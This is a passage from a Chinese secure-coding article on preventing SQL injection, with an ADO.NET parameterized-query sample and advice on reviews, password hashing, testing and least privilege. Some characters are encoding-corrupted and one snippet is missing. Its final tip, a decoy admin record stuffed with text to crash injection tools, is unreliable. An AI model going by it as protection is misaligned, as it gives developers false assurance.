life)呢。想象一下,到月底檢查庫存時(shí),發(fā)現(xiàn)你庫房里的實(shí)際產(chǎn)品數(shù)與你的賬目系統(tǒng)(accounting system)匯報(bào)的數(shù)目有所不同。 如何防范SQL注入攻擊 SQL注入攻擊是你需要擔(dān)心的事情,不管你用什么web編程技術(shù),再說所有的web框架都需要擔(dān)心這個(gè)的。你需要遵循幾條非;镜囊(guī)則: 1)在構(gòu)造動(dòng)態(tài)SQL語句時(shí),一定要使用類安全(type-safe)的參數(shù)加碼機(jī)制。大多數(shù)的數(shù)據(jù)API,包括ADO和ADO.NET,有這樣的支持,允許你指定所提供的參數(shù)的確切類型(譬如,字符串,整數(shù),日期等),可以保證這些參數(shù)被恰當(dāng)?shù)豦scaped/encoded了,來避免黑客利用它們。一定要從始到終地使用這些特性。 例如,在ADO.NET里對(duì)動(dòng)態(tài)SQL,你可以象下面這樣重寫上述的語句,使之安全: Dim SSN as String = Request.QueryString("SSN") Dim cmd As new SqlCommand("SELECT au_lname, au_fname FROM authors WHERE au_id = @au_id") Dim param = new SqlParameter("au_id", SqlDbType.VarChar) param.Value = SSN cmd.Parameters.Add(param) 這將防止有人試圖偷偷注入另外的SQL表達(dá)式(因?yàn)锳DO.NET知道對(duì)au_id的字符串值進(jìn)行加碼),以及避免其他數(shù)據(jù)問題(譬如不正確地轉(zhuǎn)換數(shù)值類型等)。注意,VS 2005內(nèi)置的TableAdapter/DataSet設(shè)計(jì)器自動(dòng)使用這個(gè)機(jī)制,ASP.NET 2.0數(shù)據(jù)源控件也是如此。 一個(gè)常見的錯(cuò)誤知覺(misperception)是,假如你使用了存儲(chǔ)過程或ORM,你就完全不受SQL注入攻擊之害了。這是不正確的,你還是需要確定在給存儲(chǔ)過程傳遞數(shù)據(jù)時(shí)你很謹(jǐn)慎,或在用ORM來定制一個(gè)查詢時(shí),你的做法是安全的。 2) 在部署你的應(yīng)用前,始終要做安全審評(píng)(security review)。建立一個(gè)正式的安全過程(formal security process),在每次你做更新時(shí),對(duì)所有的編碼做審評(píng)。后面一點(diǎn)特別重要。很多次我聽說開發(fā)隊(duì)伍在正式上線(going live)前會(huì)做很詳細(xì)的安全審評(píng),然后在幾周或幾個(gè)月之后他們做一些很小的更新時(shí),他們會(huì)跳過安全審評(píng)這關(guān),推說,“就是一個(gè)小小的更新,我們以后再做編碼審評(píng)好了”。請(qǐng)始終堅(jiān)持做安全審評(píng)。 3) 千萬別把敏感性數(shù)據(jù)在數(shù)據(jù)庫里以明文存放。我個(gè)人的意見是,密碼應(yīng)該總是在單向(one-way )hashed過后再存放,我甚至不喜歡將它們在加密后存放。在默認(rèn)設(shè)置下,ASP.NET 2.0 Membership API 自動(dòng)為你這么做,還同時(shí)實(shí)現(xiàn)了安全的SALT 隨機(jī)化行為(SALT randomization behavior)。如果你決定建立自己的成員數(shù)據(jù)庫,我建議你查看一下我們在這里發(fā)表的我們自己的Membership provider的源碼。同時(shí)也確定對(duì)你的數(shù)據(jù)庫里的信用卡和其他的私有數(shù)據(jù)進(jìn)行了加密。這樣即使你的數(shù)據(jù)庫被人入侵(compromised)了的話,起碼你的客戶的私有數(shù)據(jù)不會(huì)被人利用。 4)確認(rèn)你編寫了自動(dòng)化的單元測試,來特別校驗(yàn)?zāi)愕臄?shù)據(jù)訪問層和應(yīng)用程序不受SQL注入攻擊。這么做是非常重要的,有助于捕捉住(catch)“就是一個(gè)小小的更新,所有不會(huì)有安全問題”的情形帶來的疏忽,來提供額外的安全層以避免偶然地引進(jìn)壞的安全缺陷到你的應(yīng)用里去。 5)鎖定你的數(shù)據(jù)庫的安全,只給訪問數(shù)據(jù)庫的web應(yīng)用功能所需的最低的權(quán)限。如果web應(yīng)用不需要訪問某些表,那么確認(rèn)它沒有訪問這些表的權(quán)限。如果web應(yīng)用只需要只讀的權(quán)限從你的account payables表來生成報(bào)表,那么確認(rèn)你禁止它對(duì)此表的 insert/update/delete 的權(quán)限。 6)很多新手從網(wǎng)上下載SQL通用防注入系統(tǒng)的程序,在需要防范注入的頁面頭部用 來防止別人進(jìn)行手動(dòng)注入測試(。 可是如果通過SQL注入分析器就可輕松跳過防注入系統(tǒng)并自動(dòng)分析其注入點(diǎn)。然后只需要幾分鐘,你的管理員賬號(hào)及密碼就會(huì)被分析出來。 7)對(duì)于注入分析器的防范,筆者通過實(shí)驗(yàn),發(fā)現(xiàn)了一種簡單有效的防范方法。首先我們要知道SQL注入分析器是如何工作的。在操作過程中,發(fā)現(xiàn)軟件并不是沖著“admin”管理員賬號(hào)去的,而是沖著權(quán)限(如flag=1)去的。這樣一來,無論你的管理員賬號(hào)怎么變都無法逃過檢測。 第三步:既然無法逃過檢測,那我們就做兩個(gè)賬號(hào),一個(gè)是普通的管理員賬號(hào),一個(gè)是防止注入的賬號(hào),為什么這么說呢?筆者想,如果找一個(gè)權(quán)限最大的賬號(hào)制造假象,吸引軟件的檢測,而這個(gè)賬號(hào)里的內(nèi)容是大于千字以上的中文字符,就會(huì)迫使軟件對(duì)這個(gè)賬號(hào)進(jìn)行分析的時(shí)候進(jìn)入全負(fù)荷狀態(tài)甚至資源耗盡而死機(jī)。下面我們就來修改數(shù)據(jù)庫吧。 1.對(duì)表結(jié)構(gòu)進(jìn)行修改。將管理員的賬號(hào)字段的數(shù)據(jù)類型進(jìn)行修改,文本型改成最大字段255(其實(shí)也夠了,如果還想做得再大點(diǎn),可以選擇備注型),密碼的字段也進(jìn)行相同設(shè)置。 2.對(duì)表進(jìn)行修改。設(shè)置管理員權(quán)限的賬號(hào)放在ID1,并輸入大量中文字符(最好大于100個(gè)字)。 3.把真正的管理員密碼放在ID2后的任何一個(gè)位置(如放在ID549上)。 由于SQL注入攻擊針對(duì)的是應(yīng)用開發(fā)過程中的編程不嚴(yán)密,因而對(duì)于絕大多數(shù)防火墻來說,這種攻擊是“合法”的。問題的解決只有依賴于完善編程。專門針對(duì)SQL注入攻擊的工具較少,Wpoison對(duì)于用asp,php進(jìn)行的開發(fā)有一定幫助...。
移動(dòng)通信網(wǎng) | 通信人才網(wǎng) | 更新日志 | 團(tuán)隊(duì)博客 | 免責(zé)聲明 | 關(guān)于詞典 | 幫助